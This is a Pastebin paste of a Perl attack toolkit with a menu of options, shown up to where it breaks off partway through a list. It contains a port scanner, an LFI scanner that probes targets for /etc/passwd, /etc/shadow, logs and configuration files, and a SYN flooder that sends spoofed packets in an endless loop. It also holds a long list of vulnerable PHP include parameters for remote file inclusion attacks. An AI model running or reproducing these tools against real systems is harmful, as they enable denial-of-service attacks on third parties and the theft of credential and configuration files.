Share Pastebin
Guest
Public paste!

Untitled

By: a guest | May 18th, 2010 | Syntax: Perl | Size: 71.53 KB | Hits: 1,508 | Expires: Never
Copy text to clipboard
  1. #!/usr/bin/perl
  2. #C0d3rs|||| Monarch AKA Intruder ,,Dr4k3 ,,FallenGenesis;;Invision
  3. #Requires RawIp
  4. #Ubuntu Karmic and Lucid Lynx users to install net-raw type sudo apt-get install libnet-rawip-perl
  5. #Ubuntu Jaunty users please download net-rawip from cpan and install it ;)
  6. #This Tools are Free and open Source
  7. #Note Some Tools Require r00t privileges
  8. #Note you Must Allow Packeth Forward to flood
  9. #This Tools Were Made To Be Used On UNIX Systems, Some Tools Will Work =On Windows
  10. # Sorry For the Bad english is not my Native Language anyway yo!
  11. #site http://monarch.webuda.com
  12. #contact inmonarch@yahoo.com
  13.  
  14.  
  15. LWP::UserAgent;
  16. use Term::ANSIColor;
  17. use IO::Socket::INET;
  18. use Net::RawIP;
  19. use LWP::UserAgent;
  20.     use HTTP::Request;
  21.  
  22.     regex();
  23.    
  24.  
  25.  
  26. print q{
  27. -----------------------------------------------------------------      
  28.                           Cod3rs  
  29. -----------------------------------------------------------------                              
  30.   Monarch aka Intruder ,,Dr4k3 ,,FallenGenesis;;Invision
  31. -----------------------------------------------------------------                          
  32.                            Bugs
  33.                       Yeah!!Some Around
  34. -----------------------------------------------------------------            
  35. # 1|Portscanner                  4| RFI scanner  
  36. # 2|LFI scanner                  5| Googler <- Dr4k3                
  37. # 3|Basic DOS Agent Synflooder   6| Exploit finder <- Dr4k3            
  38. #                                                              
  39. # 7|Synflooder Requires r00t     8| Synflooder2 use with rOOt  
  40.                            # 9 help                                    
  41. -----------------------------------------------------------------
  42.  
  43.                 To Quit the Program Press CTRL + C
  44.  
  45. -------------------------------r00t------------------------------    
  46.    
  47.     },color("reset");
  48.    
  49. print ">Insert Program Number or Press CTRL+C To Quit:\n";
  50. print color("red"), "Type ",color ("reset")," help or 9  for help \n";
  51. print color("red"),"\n>>>\n",color("reset");
  52. $se = <STDIN>; chomp $se;
  53.  
  54. if($se == "1"){
  55. print color("green"), "IP Target:\n ",color("reset");
  56. chomp (my $server = <STDIN>);
  57. $op = 1;
  58. while($op <= 65535)
  59. {
  60. $ports = new IO::Socket::INET (
  61. PeerAddr => $server,
  62. PeerPort => $op,
  63. Proto => "tcp");
  64. if($ports)
  65. {
  66. print "$op ", color("red"),"Open\n",color("reset");
  67. }
  68. $op++;}
  69. }
  70.  
  71.  
  72.  
  73. if($se == "2"){
  74.     print color ("green"), ">Insert  Link[...]\n";
  75.     print '>',color ("reset");chomp($link = <STDIN>);
  76.  
  77.     if($link !~ /http:\/\//) { $link = "http://$link"; }
  78.  
  79.     print color ("bold blue"), "\n>[Enter] to check  httpd Version[...]\n",color ("reset");
  80.     $httpd =<STDIN>;
  81.  
  82.     $host = $link;
  83.     $useragent = LWP::UserAgent->new;
  84.     $resp = $useragent->head($host);
  85.     print $resp->headers_as_string;
  86.  
  87.     print color ("red"), "\n>[Enter]  To Search For LFI Vulnerabilties[...]\n",color ("reset");
  88.     $start =<STDIN>;
  89.  
  90.    
  91.  
  92.     @vuls = ('/etc/passwd',
  93.     '/etc/shadow',
  94.     '/etc/group',
  95.     '/etc/security/group',
  96.     '/etc/security/passwd',
  97.     '/etc/security/user',
  98.     '/etc/security/environ',
  99.     '/etc/security/limits',
  100.     '/usr/lib/security/mkuser.default',
  101.     '/apache/logs/access.log',
  102.     '/apache/logs/error.log',
  103.     '/etc/httpd/logs/acces.log',
  104.     '/etc/httpd/logs/error.log',
  105.     '/var/www/logs/access_log',
  106.     '/usr/local/apache/logs/access_ log',
  107.     '/var/log/apache/access_log',
  108.     '/var/log/apache2/access_log',
  109.     '/var/log/apache/access.log',
  110.     '/var/log/access.log',
  111.     '/var/www/logs/error.log',
  112.     '/usr/local/apache/logs/error_log',
  113.     '/var/log/apache/error_log',
  114.     '/var/log/apache2/error_log',
  115.     '/var/log/error_log',
  116.     '/var/log/httpd/access_log',
  117.     '/var/log/httpd/error_log',
  118.     '/apache2/logs/error.log',
  119.     '/apache2/logs/access.log',
  120.     '/logs/error.log',
  121.     '/logs/access.log',
  122.     '/etc/httpd/logs/acces.log',
  123.     '/etc/httpd/logs/error.log',
  124.     '/usr/local/apache/logs/error_log',
  125.     '/usr/local/apache2/logs/access_log',
  126.     '/var/www/logs/access_log',
  127.     '/var/www/logs/error.log',
  128.     '/var/log/httpd/access_log',
  129.     '/var/log/httpd/error.log',
  130.     '/var/log/apache/access_log',
  131.     '/var/log/apache/error.log',
  132.     '/var/log/apache2/access_log',
  133.     '/var/log/apache2/error.log',
  134.     '/var/log/access_log',
  135.     '/var/log/error.log',
  136.     '/opt/lampp/logs/access_log',
  137.     '/opt/lampp/logs/error_log',
  138.     '/opt/xampp/logs/access_log',
  139.     '/opt/xampp/logs/error_log',
  140.     '/opt/lampp/logs/access.log',
  141.     '/opt/lampp/logs/error.log',
  142.     '/Program Files\Apache Group\Apache\logs\access.log',
  143.     '/Program Files\Apache Group\Apache\logs\error.log',
  144.     '/logs/error.log',
  145.     '/logs/access.log',
  146.     '/var/www/logs/access.log',
  147.     '/usr/local/apache/logs/access_log',
  148.     '/usr/local/apache/logs/access.log',
  149.     '/var/log/apache/access_log',
  150.     '/var/log/apache/access.log',
  151.     '/var/log/access_log',
  152.     '/var/www/logs/error_log',
  153.     '/var/www/logs/error.log',
  154.     '/usr/local/apache/logs/error_log',
  155.     '/var/log/apache/error.log',
  156.     '/var/log/access_log',
  157.     '/var/log/error_log',
  158.     '/usr/local/apache/conf/httpd.conf',
  159.     '/usr/local/apache2/conf/httpd.conf',
  160.     '/etc/httpd/conf/httpd.conf',
  161.     '/etc/apache/conf/httpd.conf',
  162.     '/usr/local/etc/apache/conf/httpd.conf',
  163.     '/etc/apache2/httpd.conf',
  164.     '/usr/local/apache/conf/httpd.conf',
  165.     '/usr/local/apache2/conf/httpd.conf',
  166.     '/usr/local/apache/httpd.conf',
  167.     '/usr/local/apache2/httpd.conf',
  168.     '/usr/local/httpd/conf/httpd.conf',
  169.     '/usr/local/etc/apache/conf/httpd.conf',
  170.     '/usr/local/etc/apache2/conf/httpd.conf',
  171.     '/usr/local/etc/httpd/conf/httpd.conf',
  172.     '/usr/apache2/conf/httpd.conf',
  173.     '/usr/apache/conf/httpd.conf',
  174.     '/etc/apache/conf/httpd.conf',
  175.     '/etc/apache2/conf/httpd.conf',
  176.     '/etc/httpd/conf/httpd.conf',
  177.     '/etc/http/conf/httpd.conf',
  178.     '/etc/apache2/httpd.conf',
  179.     '/etc/httpd/httpd.conf',
  180.     '/etc/http/httpd.conf',
  181.     '/etc/httpd.conf',
  182.     '/opt/apache/conf/httpd.conf',
  183.     '/opt/apache2/conf/httpd.conf',
  184.     '/var/www/conf/httpd.conf',
  185.     '/private/etc/httpd/httpd.conf',
  186.     '/private/etc/httpd/httpd.conf.default',
  187.     '/Volumes/webBackup/opt/apache2/conf/httpd.conf',
  188.     '/Volumes/webBackup/private/etc/httpd/httpd.conf',
  189.     '/Volumes/webBackup/private/etc/httpd/httpd.conf.default',
  190.     '/Program Files\Apache Group\Apache\conf\httpd.conf',
  191.     '/Program Files\Apache Group\Apache2\conf\httpd.conf',
  192.     '/Program Files\xampp\apache\conf\httpd.conf',
  193.     '/usr/local/php/httpd.conf.php',
  194.     '/usr/local/php4/httpd.conf.php',
  195.     '/usr/local/php5/httpd.conf.php',
  196.     '/usr/local/php/httpd.conf',
  197.     '/usr/local/php4/httpd.conf',
  198.     '/usr/local/php5/httpd.conf',
  199.     '/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
  200.     '/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',
  201.     '/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',
  202.     '/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',
  203.     '/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',
  204.     '/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',
  205.     '/usr/local/etc/apache/vhosts.conf',
  206.     '/etc/php.ini',
  207.     '/bin/php.ini',
  208.     '/etc/httpd/php.ini',
  209.     '/usr/lib/php.ini',
  210.     '/usr/lib/php/php.ini',
  211.     '/usr/local/etc/php.ini',
  212.     '/usr/local/lib/php.ini',
  213.     '/usr/local/php/lib/php.ini',
  214.     '/usr/local/php4/lib/php.ini',
  215.     '/usr/local/php5/lib/php.ini',
  216.     '/usr/local/apache/conf/php.ini',
  217.     '/etc/php4.4/fcgi/php.ini',
  218.     '/etc/php4/apache/php.ini',
  219.     '/etc/php4/apache2/php.ini',
  220.     '/etc/php5/apache/php.ini',
  221.     '/etc/php5/apache2/php.ini',
  222.     '/etc/php/php.ini',
  223.     '/etc/php/php4/php.ini',
  224.     '/etc/php/apache/php.ini',
  225.     '/etc/php/apache2/php.ini',
  226.     '/web/conf/php.ini',
  227.     '/usr/local/Zend/etc/php.ini',
  228.     '/opt/xampp/etc/php.ini',
  229.     '/var/local/www/conf/php.ini',
  230.     '/etc/php/cgi/php.ini',
  231.     '/etc/php4/cgi/php.ini',
  232.     '/etc/php5/cgi/php.ini',
  233.     '/php5\php.ini',
  234.     '/php4\php.ini',
  235.     '/php\php.ini',
  236.     '/PHP\php.ini',
  237.     '/WINDOWS\php.ini',
  238.     '/WINNT\php.ini',
  239.     '/apache\php\php.ini',
  240.     '/xampp\apache\bin\php.ini',
  241.     '/NetServer\bin\stable\apache\php.ini',
  242.     '/home2\bin\stable\apache\php.ini',
  243.     '/home\bin\stable\apache\php.ini',
  244.     '/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',
  245.     '/usr/local/cpanel/logs',
  246.     '/usr/local/cpanel/logs/stats_log',
  247.     '/usr/local/cpanel/logs/access_log',
  248.     '/usr/local/cpanel/logs/error_log',
  249.     '/usr/local/cpanel/logs/license_log',
  250.     '/usr/local/cpanel/logs/login_log',
  251.     '/usr/local/cpanel/logs/stats_log',
  252.     '/var/cpanel/cpanel.config',
  253.     '/var/log/mysql/mysql-bin.log',
  254.     '/var/log/mysql.log',
  255.     '/var/log/mysqlderror.log',
  256.     '/var/log/mysql/mysql.log',
  257.     '/var/log/mysql/mysql-slow.log',
  258.     '/var/mysql.log',
  259.     '/var/lib/mysql/my.cnf',
  260.     '/etc/mysql/my.cnf',
  261.     '/etc/my.cnf',
  262.     '/etc/logrotate.d/proftpd',
  263.     '/www/logs/proftpd.system.log',
  264.     '/var/log/proftpd',
  265.     '/etc/proftp.conf',
  266.     '/etc/protpd/proftpd.conf',
  267.     '/etc/vhcs2/proftpd/proftpd.conf',
  268.     '/etc/proftpd/modules.conf',
  269.     '/var/log/vsftpd.log',
  270.     '/etc/vsftpd.chroot_list',
  271.     '/etc/logrotate.d/vsftpd.log',
  272.     '/etc/vsftpd/vsftpd.conf',
  273.     '/etc/vsftpd.conf',
  274.     '/etc/chrootUsers',
  275.     '/var/log/xferlog',
  276.     '/var/adm/log/xferlog',
  277.     '/etc/wu-ftpd/ftpaccess',
  278.     '/etc/wu-ftpd/ftphosts',
  279.     '/etc/wu-ftpd/ftpusers',
  280.     '/usr/sbin/pure-config.pl',
  281.     '/usr/etc/pure-ftpd.conf',
  282.     '/etc/pure-ftpd/pure-ftpd.conf',
  283.     '/usr/local/etc/pure-ftpd.conf',
  284.     '/usr/local/etc/pureftpd.pdb',
  285.     '/usr/local/pureftpd/etc/pureftpd.pdb',
  286.     '/usr/local/pureftpd/sbin/pure-config.pl',
  287.     '/usr/local/pureftpd/etc/pure-ftpd.conf',
  288.     '-/etc/pure-ftpd.conf',
  289.     '/etc/pure-ftpd/pure-ftpd.pdb',
  290.     '/etc/pureftpd.pdb',
  291.     '/etc/pureftpd.passwd',
  292.     '/etc/pure-ftpd/pureftpd.pdb',
  293.     '/usr/ports/ftp/pure-ftpd/',
  294.     '/usr/ports/net/pure-ftpd/',
  295.     '/usr/pkgsrc/net/pureftpd/',
  296.     '/usr/ports/contrib/pure-ftpd/',
  297.     '/var/log/pure-ftpd/pure-ftpd.log',
  298.     '/logs/pure-ftpd.log',
  299.     '/var/log/pureftpd.log',
  300.     '/var/log/ftp-proxy/ftp-proxy.log',
  301.     '/var/log/ftp-proxy',
  302.     '/var/log/ftplog',
  303.     '/etc/logrotate.d/ftp',
  304.     '/etc/ftpchroot',
  305.     '/etc/ftphosts',
  306.     '/var/log/exim_mainlog',
  307.     '/var/log/exim/mainlog',
  308.     '/var/log/maillog',
  309.     '/var/log/exim_paniclog',
  310.     '/var/log/exim/paniclog',
  311.     '/var/log/exim/rejectlog',
  312.     '/var/log/exim_rejectlog');
  313.  
  314.     print color ("red"), ">Scanner Initialized[...]\n",color ("reset");
  315.  
  316.  
  317.     foreach $scan(@vuls){
  318.  
  319.     $url = $link.$scan;
  320.     $request = HTTP::Request->new(GET=>$url);
  321.     $useragent = LWP::UserAgent->new();
  322.  
  323.     $response = $useragent->request($request);
  324.     if ($response->is_success && $response->content =~ /root:x:/) {  
  325.     print ("$scan..........[",color("green"),"Vulnerable", color ("reset"),"]\n");}
  326.    
  327.     else {  
  328.     print ("$scan..........[",color("green"),"Not Found", color ("reset"),"]\n");}
  329.    
  330. }
  331.     sub regex(){
  332.     $sis="$^O";if ($sis eq windows){ $cmd="clear";} else { $cmd="cls"; }
  333.     system("$cmd");
  334.     }
  335. }
  336.  
  337.  
  338. if($se == "7"){
  339.  
  340. print color ("red"),"Target-ip\n",color ("reset");
  341. $dst=<stdin>;
  342. chop ($dst);
  343. print color ("red"),"target port\n",color ("reset");
  344. $port=<stdin>;
  345. chop ($port);
  346.  $flood = new Net::RawIP;
  347.  while(1) {
  348.          my $src_port = int(rand(65534)+1);
  349.      my $src = join ".", map int rand 255, 1 .. 4;
  350.      my $size = 60000;
  351.        $flood->set({
  352.                   ip =>
  353.                     {
  354.                       saddr => $src,
  355.                       daddr => $dst
  356.                     },
  357.                     tcp =>
  358.                     {
  359.                      source => $src_port,
  360.                      data=> $size,
  361.                      dest => $port,
  362.                      syn => 1
  363.                     }
  364.                 });
  365.         print color ("red"),"[+]",color("reset"),"flooding $dst:$port spoofing-ip $src:$src_port\n";
  366.         $flood->send;
  367.    }
  368. }
  369.  
  370. if($se == "4"){
  371.     print color ("green"),">Insert  Link[...]\n";
  372.     print '>',color ("reset");
  373.     chomp($link = <STDIN>);
  374.  
  375.     if($link !~ /http:\/\//) { $link = "http://".$link; }
  376.  
  377.    
  378.  
  379.    
  380.  
  381.     @vuls = ('includes/header.php?systempath=',
  382.  
  383. 'Gallery/displayCategory.php?basepath=',
  384.  
  385. 'index.inc.php?PATH_Includes=',
  386.  
  387. 'nphp/nphpd.php?nphp_config[LangFile]=',
  388.  
  389. 'include/db.php?GLOBALS[rootdp]=',
  390.  
  391. 'ashnews.php?pathtoashnews=',
  392.  
  393. 'ashheadlines.php?pathtoashnews=',
  394.  
  395. 'modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=',
  396.  
  397. 'demo/includes/init.php?user_inc=',
  398.  
  399. 'jaf/index.php?show=',
  400.  
  401. 'inc/shows.inc.php?cutepath=',
  402.  
  403. 'poll/admin/common.inc.php?base_path=',
  404.  
  405. 'pollvote/pollvote.php?pollname=',
  406.  
  407. 'sources/post.php?fil_config=',
  408.  
  409. 'modules/My_eGallery/public/displayCategory.php?basepath=',
  410.  
  411. 'bb_lib/checkdb.inc.php?libpach=',
  412.  
  413. 'include/livre_include.php?no_connectlol&chem_absolu=',
  414.  
  415. 'index.php?from_marketY&pageurl=',
  416.  
  417. 'modules/mod_mainmenu.php?mosConfig_absolute_path=',
  418.  
  419. 'pivot/modules/module_db.php?pivot_path=',
  420.  
  421. 'modules/nAlbum/public/displayCategory.php?basepath=',
  422.  
  423. 'derniers_commentaires.php?rep=',
  424.  
  425. 'modules/coppermine/themes/default/theme.php?THEME_DIR=',
  426.  
  427. 'modules/coppermine/include/init.inc.php?CPG_M_DIR=',
  428.  
  429. 'modules/coppermine/themes/coppercop/theme.php?THEME_DIR=',
  430.  
  431. 'coppermine/themes/maze/theme.php?THEME_DIR=',
  432.  
  433. 'allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=',
  434.  
  435. 'allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=',
  436.  
  437. 'myPHPCalendar/admin.php?cal_dir=',
  438.  
  439. 'agendax/addevent.inc.php?agendax_path=',
  440.  
  441. 'modules/mod_mainmenu.php?mosConfig_absolute_path=',
  442.  
  443. 'modules/PNphpBB/includes/functions_admin.php?phpbb_root_path=',
  444.  
  445. 'main.php?page=',
  446.  
  447. 'default.php?page=',
  448.  
  449. 'index.php?action=',
  450.  
  451. 'index.php?p=',
  452.  
  453. 'index.php?x=',
  454.  
  455. 'index.php?content=',
  456.  
  457. 'index.php?conteudo=',
  458.  
  459. 'index.php?cat=',
  460.  
  461. 'include/new-visitor.inc.php?lvc_include_dir=',
  462.  
  463. 'modules/agendax/addevent.inc.php?agendax_path=',
  464.  
  465. 'shoutbox/expanded.php?conf=',
  466.  
  467. 'modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=',
  468.  
  469. 'pivot/modules/module_db.php?pivot_path=',
  470.  
  471. 'library/editor/editor.php?root=',
  472.  
  473. 'library/lib.php?root=',
  474.  
  475. 'e/e_handlers/secure_img_render.php?p=',
  476.  
  477. 'zentrack/index.php?configFile=',
  478.  
  479. 'main.php?x=',
  480.  
  481. 'becommunity/community/index.php?pageurl=',
  482.  
  483. 'GradeMap/index.php?page=',
  484.  
  485. 'phpopenchat/contrib/yabbse/poc.php?sourcedir=',
  486.  
  487. 'calendar/calendar.php?serverPath=',
  488.  
  489. 'calendar/functions/popup.php?serverPath=',
  490.  
  491. 'calendar/events/header.inc.php?serverPath=',
  492.  
  493. 'calendar/events/datePicker.php?serverPath=',
  494.  
  495. 'calendar/setup/setupSQL.php?serverPath=',
  496.  
  497. 'calendar/setup/header.inc.php?serverPath=',
  498.  
  499. 'mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=',
  500.  
  501. 'zentrack/index.php?configFile=',
  502.  
  503. 'pivot/modules/module_db.php?pivot_path=',
  504.  
  505. 'inc/header.php/step_one.php?server_inc=',
  506.  
  507. 'install/index.php?lng../../include/main.inc&G_PATH=',
  508.  
  509. 'inc/pipe.php?HCL_path=',
  510.  
  511. 'include/write.php?dir=',
  512.  
  513. 'include/new-visitor.inc.php?lvc_include_dir=',
  514.  
  515. 'includes/header.php?systempath=',
  516.  
  517. 'support/mailling/maillist/inc/initdb.php?absolute_path=',
  518.  
  519. 'coppercop/theme.php?THEME_DIR=',
  520.  
  521. 'zentrack/index.php?configFile=',
  522.  
  523. 'pivot/modules/module_db.php?pivot_path=',
  524.  
  525. 'inc/header.php/step_one.php?server_inc=',
  526.  
  527. 'install/index.php?lng../../include/main.inc&G_PATH=',
  528.  
  529. 'inc/pipe.php?HCL_path=',
  530.  
  531. 'include/write.php?dir=',
  532.  
  533. 'include/new-visitor.inc.php?lvc_include_dir=',
  534.  
  535. 'includes/header.php?systempath=',
  536.  
  537. 'support/mailling/maillist/inc/initdb.php?absolute_path=',
  538.  
  539. 'coppercop/theme.php?THEME_DIR=',
  540.  
  541. 'becommunity/community/index.php?pageurl=',
  542.  
  543. 'shoutbox/expanded.php?conf=',
  544.  
  545. 'agendax/addevent.inc.php?agendax_path=',
  546.  
  547. 'myPHPCalendar/admin.php?cal_dir=',
  548.  
  549. 'yabbse/Sources/Packages.php?sourcedir=',
  550.  
  551. 'dotproject/modules/projects/addedit.php?root_dir=',
  552.  
  553. 'dotproject/modules/projects/view.php?root_dir=',
  554.  
  555. 'dotproject/modules/projects/vw_files.php?root_dir=',
  556.  
  557. 'dotproject/modules/tasks/addedit.php?root_dir=',
  558.  
  559. 'dotproject/modules/tasks/viewgantt.php?root_dir=',
  560.  
  561. 'My_eGallery/public/displayCategory.php?basepath=',
  562.  
  563. 'modules/My_eGallery/public/displayCategory.php?basepath=',
  564.  
  565. 'modules/nAlbum/public/displayCategory.php?basepath=',
  566.  
  567. 'modules/coppermine/themes/default/theme.php?THEME_DIR=',
  568.  
  569. 'modules/agendax/addevent.inc.php?agendax_path=',
  570.  
  571. 'modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=',
  572.  
  573. 'modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=',
  574.  
  575. 'modules/coppermine/include/init.inc.php?CPG_M_DIR=',
  576.  
  577. 'modules/mod_mainmenu.php?mosConfig_absolute_path=',
  578.  
  579. 'shoutbox/expanded.php?conf=',
  580.  
  581. 'pivot/modules/module_db.php?pivot_path=',
  582.  
  583. 'library/editor/editor.php?root=',
  584.  
  585. 'library/lib.php?root=',
  586.  
  587. 'e/e_handlers/secure_img_render.php?p=',
  588.  
  589. 'main.php?x=',
  590.  
  591. 'main.php?page=',
  592.  
  593. 'index.php?meio.php=',
  594.  
  595. 'index.php?include=',
  596.  
  597. 'index.php?inc=',
  598.  
  599. 'index.php?page=',
  600.  
  601. 'index.php?pag=',
  602.  
  603. 'index.php?p=',
  604.  
  605. 'index.php?x=',
  606.  
  607. 'index.php?open=',
  608.  
  609. 'index.php?visualizar=',
  610.  
  611. 'index.php?pagina=',
  612.  
  613. 'index.php?content=',
  614.  
  615. 'inc/step_one_tables.php?server_inc=',
  616.  
  617. 'GradeMap/index.php?page=',
  618.  
  619. 'phpshop/index.php?base_dir=',
  620.  
  621. 'admin.php?cal_dir=',
  622.  
  623. 'contacts.php?cal_dir=',
  624.  
  625. 'convert-date.php?cal_dir=',
  626.  
  627. 'album_portal.php?phpbb_root_path=',
  628.  
  629. 'mainfile.php?MAIN_PATH=',
  630.  
  631. 'dotproject/modules/files/index_table.php?root_dir=',
  632.  
  633. 'html/affich.php?base=',
  634.  
  635. 'gallery/init.php?HTTP_POST_VARS=',
  636.  
  637. 'pm/lib.inc.php?pm_path=',
  638.  
  639. 'ideabox/include.php?gorumDir=',
  640.  
  641. 'index.php?includes_dir=',
  642.  
  643. 'forums/toplist.php?phpbb_root_path=',
  644.  
  645. 'forum/toplist.php?phpbb_root_path=',
  646.  
  647. 'admin/config_settings.tpl.php?include_path=',
  648.  
  649. 'include/common.php?include_path=',
  650.  
  651. 'event/index.php?page=',
  652.  
  653. 'forum/index.php?includeFooter=',
  654.  
  655. 'forums/index.php?includeFooter=',
  656.  
  657. 'forum/bb_admin.php?includeFooter=',
  658.  
  659. 'forums/bb_admin.php?includeFooter=',
  660.  
  661. 'language/lang_english/lang_activity.php?phpbb_root_path=',
  662.  
  663. 'forum/language/lang_english/lang_activity.php?phpbb_root_path=',
  664.  
  665. 'blend_data/blend_common.php?phpbb_root_path=',
  666.  
  667. 'master.php?root_path=',
  668.  
  669. 'includes/kb_constants.php?module_root_path=',
  670.  
  671. 'forum/includes/kb_constants.php?module_root_path=',
  672.  
  673. 'forums/includes/kb_constants.php?module_root_path=',
  674.  
  675. 'classes/adodbt/sql.php?classes_dir=',
  676.  
  677. 'agenda.php?rootagenda=',
  678.  
  679. 'agenda.php?rootagenda=',
  680.  
  681. 'sources/lostpw.php?CONFIG[path]=',
  682.  
  683. 'topsites/sources/lostpw.php?CONFIG[path]=',
  684.  
  685. 'toplist/sources/lostpw.php?CONFIG[path]=',
  686.  
  687. 'sources/join.php?CONFIG[path]=',
  688.  
  689. 'topsites/sources/join.php?CONFIG[path]=',
  690.  
  691. 'toplist/sources/join.php?CONFIG[path]=',
  692.  
  693. 'topsite/sources/join.php?CONFIG[path]=',
  694.  
  695. 'public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=',
  696.  
  697. 'extras/poll/poll.php?file_newsportal=',
  698.  
  699. 'index.php?site_path=',
  700.  
  701. 'mail/index.php?site_path=',
  702.  
  703. 'fclick/show.php?path=',
  704.  
  705. 'show.php?path=',
  706.  
  707. 'calogic/reconfig.php?GLOBALS[CLPath]=',
  708.  
  709. 'eshow.php?Config_rootdir=',
  710.  
  711. 'auction/auction_common.php?phpbb_root_path=',
  712.  
  713. 'index.php?inc_dir=',
  714.  
  715. 'calendar/index.php?inc_dir=',
  716.  
  717. 'modules/TotalCalendar/index.php?inc_dir=',
  718.  
  719. 'modules/calendar/index.php?inc_dir=',
  720.  
  721. 'calendar/embed/day.php?path=',
  722.  
  723. 'ACalendar/embed/day.php?path=',
  724.  
  725. 'calendar/add_event.php?inc_dir=',
  726.  
  727. 'claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=',
  728.  
  729. 'claroline/auth/ldap/authldap.php?includePath=',
  730.  
  731. 'docebo/modules/credits/help.php?lang=',
  732.  
  733. 'modules/credits/help.php?lang=',
  734.  
  735. 'config.php?returnpath=',
  736.  
  737. 'editsite.php?returnpath=',
  738.  
  739. 'in.php?returnpath=',
  740.  
  741. 'addsite.php?returnpath=',
  742.  
  743. 'includes/pafiledb_constants.php?module_root_path=',
  744.  
  745. 'phpBB/includes/pafiledb_constants.php?module_root_path=',
  746.  
  747. 'pafiledb/includes/pafiledb_constants.php?module_root_path=',
  748.  
  749. 'auth/auth.php?phpbb_root_path=',
  750.  
  751. 'auth/auth_phpbb/phpbb_root_path=',
  752.  
  753. 'apc-aa/cron.php?GLOBALS[AA_INC_PATH]=',
  754.  
  755. 'apc-aa/cached.php?GLOBALS[AA_INC_PATH]=',
  756.  
  757. 'infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=',
  758.  
  759. 'phpdig/includes/config.php?relative_script_path=',
  760.  
  761. 'includes/phpdig/includes/config.php?relative_script_path=',
  762.  
  763. 'includes/dbal.php?eqdkp_root_path=',
  764.  
  765. 'eqdkp/includes/dbal.php?eqdkp_root_path=',
  766.  
  767. 'dkp/includes/dbal.php?eqdkp_root_path=',
  768.  
  769. 'include/SQuery/gameSpy.php?libpath=',
  770.  
  771. 'include/global.php?GLOBALS[includeBit]=',
  772.  
  773. 'topsites/config.php?returnpath=',
  774.  
  775. 'manager/frontinc/prepend.php?_PX_config[manager_path]=',
  776.  
  777. 'ubbthreads/addpost_newpoll.php?addpollthispath=',
  778.  
  779. 'forum/addpost_newpoll.php?thispath=',
  780.  
  781. 'forums/addpost_newpoll.php?thispath=',
  782.  
  783. 'ubbthreads/ubbt.inc.php?thispath=',
  784.  
  785. 'forums/ubbt.inc.php?thispath=',
  786.  
  787. 'forum/ubbt.inc.php?thispath=',
  788.  
  789. 'forum/admin/addentry.php?phpbb_root_path=',
  790.  
  791. 'admin/addentry.php?phpbb_root_path=',
  792.  
  793. 'index.php?f=',
  794.  
  795. 'index.php?act=',
  796.  
  797. 'ipchat.php?root_path=',
  798.  
  799. 'includes/orderSuccess.inc.php?glob[rootDir]=',
  800.  
  801. 'stats.php?dir[func]dir[base]=',
  802.  
  803. 'ladder/stats.php?dir[base]=',
  804.  
  805. 'ladders/stats.php?dir[base]=',
  806.  
  807. 'sphider/admin/configset.php?settings_dir=',
  808.  
  809. 'admin/configset.php?settings_dir=',
  810.  
  811. 'vwar/admin/admin.php?vwar_root=',
  812.  
  813. 'modules/vwar/admin/admin.php?vwar_root=',
  814.  
  815. 'modules/vWar_Account/includes/get_header.php?vwar_root=',
  816.  
  817. 'modules/vWar_Account/includes/functions_common.php?vwar_root=',
  818.  
  819. 'sphider/admin/configset.php?settings_dir=',
  820.  
  821. 'admin/configset.php?settings_dir=',
  822.  
  823. 'impex/ImpExData.php?systempath=',
  824.  
  825. 'forum/impex/ImpExData.php?systempath=',
  826.  
  827. 'forums/impex/ImpExData.php?systempath=',
  828.  
  829. 'application.php?base_path=',
  830.  
  831. 'index.php?theme_path=',
  832.  
  833. 'become_editor.php?theme_path=',
  834.  
  835. 'add.php?theme_path=',
  836.  
  837. 'bad_link.php?theme_path=',
  838.  
  839. 'browse.php?theme_path=',
  840.  
  841. 'detail.php?theme_path=',
  842.  
  843. 'fav.php?theme_path=',
  844.  
  845. 'get_rated.php?theme_path=',
  846.  
  847. 'login.php?theme_path=',
  848.  
  849. 'mailing_list.php?theme_path=',
  850.  
  851. 'new.php?theme_path=',
  852.  
  853. 'modify.php?theme_path=',
  854.  
  855. 'pick.php?theme_path=',
  856.  
  857. 'power_search.php?theme_path=',
  858.  
  859. 'rating.php?theme_path=',
  860.  
  861. 'register.php?theme_path=',
  862.  
  863. 'review.php?theme_path=',
  864.  
  865. 'rss.php?theme_path=',
  866.  
  867. 'search.php?theme_path=',
  868.  
  869. 'send_pwd.php?theme_path=',
  870.  
  871. 'sendmail.php?theme_path=',
  872.  
  873. 'tell_friend.php?theme_path=',
  874.  
  875. 'top_rated.php?theme_path=',
  876.  
  877. 'user_detail.php?theme_path=',
  878.  
  879. 'user_search.php?theme_path=',
  880.  
  881. 'invoice.php?base_path=',
  882.  
  883. 'cgi-bin//classes/adodbt/sql.php?classes_dir=',
  884.  
  885. 'cgi-bin/install/index.php?G_PATH=',
  886.  
  887. 'cgi-bin/include/print_category.php?dir=',
  888.  
  889. 'includes/class_template.php?quezza_root_path=',
  890.  
  891. 'bazar/classified_right.php?language_dir=',
  892.  
  893. 'classified_right.php?language_dir=',
  894.  
  895. 'phpBazar/classified_right.php?language_dir=',
  896.  
  897. 'chat/messagesL.php?cmd=',
  898.  
  899. 'phpMyChat/chat/messagesL.php?cmd=',
  900.  
  901. 'bbs/include/write.php?dir=',
  902.  
  903. 'visitorupload.php?cmd=',
  904.  
  905. 'modules/center/admin/accounts/process.php?module_path]=',
  906.  
  907. 'index.php?template=',
  908.  
  909. 'armygame.php?libpath=',
  910.  
  911. 'lire.php?rub=',
  912.  
  913. 'pathofhostadmin/?page=',
  914.  
  915. 'apa_phpinclude.inc.php?apa_module_basedir=',
  916.  
  917. 'index.php?req_path=',
